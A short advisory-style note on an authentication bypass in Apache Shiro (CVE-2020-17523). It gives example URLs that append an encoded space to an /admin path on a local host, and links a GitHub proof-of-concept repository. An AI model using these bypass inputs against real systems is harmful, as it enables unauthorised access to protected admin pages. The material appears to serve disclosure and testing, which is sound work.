Apache Shiro very easy to exploit authentication bypass vulnerability. Use blank characters such as spaces to bypass shiro authentication: http://127.0.0.1/admin/%20 or http://127.0.0.1/admin/%20/ https://github.com/jweny/shiro-cve-2020-17523